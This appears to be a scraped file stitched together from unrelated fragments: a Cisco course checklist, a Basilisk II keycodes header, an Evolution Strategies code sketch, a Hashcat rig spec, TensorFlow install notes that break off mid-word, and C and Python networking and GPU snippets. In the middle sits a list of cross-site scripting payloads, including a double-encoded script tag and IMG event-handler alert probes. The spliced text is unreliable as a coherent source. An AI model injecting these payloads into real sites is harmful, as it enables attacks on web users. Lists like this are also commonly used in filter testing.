This is the engineering journal I will keep during my journey with the Cisco Networking Academy.
1 - DONE
2 - DONE
3 - DONE
4 - DONE
5 - DONE
6 - DONE
7 - DONE
8 - DONE
# /usr/share/BasiliskII/keycodes
#
# Basilisk II (C) 1997-2005 Christian Bauer
#
# This file is used to translate the (server-specific) scancodes to
# Mac keycodes depending on the window server being used.
#
# The format of this file is as follows:
#
# sdl <driver string>
# Evolution Strategies with Keras
# Based on: https://blog.openai.com/evolution-strategies/
# Implementation by: Nicholas Samoray
#
# README
# Meant to be run on a single machine.
# APPLY_BIAS is currently not working; keep it set to False.
# Solves CartPole as-is in about 50 episodes.
# Solves BipedalWalker-v2 in about 1000 episodes.
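#
# Below is a minimal, hypothetical sketch of the ES parameter update described
# in the blog post above; it is not this repository's implementation. The
# `evaluate` callback (returning episode reward for a flat weight vector) and
# the hyperparameters npop/sigma/alpha are assumptions for illustration.
import numpy as np

def es_step(theta, evaluate, npop=50, sigma=0.1, alpha=0.01):
    """One Evolution Strategies ascent step on the flat parameter vector theta."""
    noise = np.random.randn(npop, theta.size)        # one Gaussian perturbation per candidate
    rewards = np.array([evaluate(theta + sigma * n) for n in noise])
    advantages = (rewards - rewards.mean()) / (rewards.std() + 1e-8)  # normalize rewards
    grad = noise.T @ advantages / (npop * sigma)     # estimate of the reward gradient
    return theta + alpha * grad                      # gradient ascent on expected reward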

Product: Sagitta Brutalis 1080 Ti (SKU N4X48-GTX1080TI-2620-128-2X500)
Software: Hashcat 3.5.0-22-gef6467b, Nvidia driver 381.09
Accelerator: 8x Nvidia GTX 1080 Ti Founders Edition
The official instructions for installing TensorFlow are at https://www.tensorflow.org/install. If you just want to install TensorFlow with pip, you are running a supported Ubuntu LTS distribution, and you are happy to install the corresponding tested CUDA versions (which are often outdated), by all means go ahead. A good alternative may be to run a Docker image.
I am usually unhappy installing what are, in effect, pre-built binaries. These binaries are often incompatible with the Ubuntu version I am running, the CUDA version I have installed, and so on. Furthermore, they may be slower than binaries optimized for the target architecture, since certain CPU instructions (e.g. AVX2, FMA) are not used.
So installing TensorFlow from source becomes a necessity. The official instructions on building TensorFlow from source are here: ht
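Whichever route you take (pip wheel, Docker image, or a source build), a quick sanity check from Python confirms which build actually got picked up and whether it was compiled with CUDA; wheels built without AVX2/FMA support typically also log a warning to that effect when TensorFlow starts. A minimal check, assuming nothing beyond a standard TensorFlow installation:

import tensorflow as tf

# Which build is actually on the path, and was it compiled with CUDA support?
print(tf.__version__)
print(tf.test.is_built_with_cuda())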
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
int main() {
  const char* server_name = "localhost";     /* peer host; resolved below as the loopback address */
  const int server_port = 8877;              /* TCP port the server listens on */
  struct sockaddr_in addr = {0};
  addr.sin_family = AF_INET;
  addr.sin_port = htons(server_port);
  inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);
  int sock = socket(AF_INET, SOCK_STREAM, 0);  /* plain blocking TCP client socket */
  if (sock < 0 || connect(sock, (struct sockaddr *)&addr, sizeof addr) < 0) {
    perror(server_name);
    return 1;
  }
  close(sock);
  return 0;
}
from tensorflow.python.client import device_lib

def get_available_gpus():
    """Return the names of all GPU devices visible to TensorFlow."""
    local_device_protos = device_lib.list_local_devices()
    return [x.name for x in local_device_protos if x.device_type == 'GPU']

get_available_gpus()
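The snippet above relies on the internal device_lib module, which works but is not part of the public API. In TensorFlow 2.x the same check can be done through tf.config; a minimal equivalent, assuming a recent 2.x installation:

import tensorflow as tf

# Public-API equivalent (TensorFlow 2.x): list the GPUs TensorFlow can see.
gpus = tf.config.list_physical_devices('GPU')
print([gpu.name for gpu in gpus])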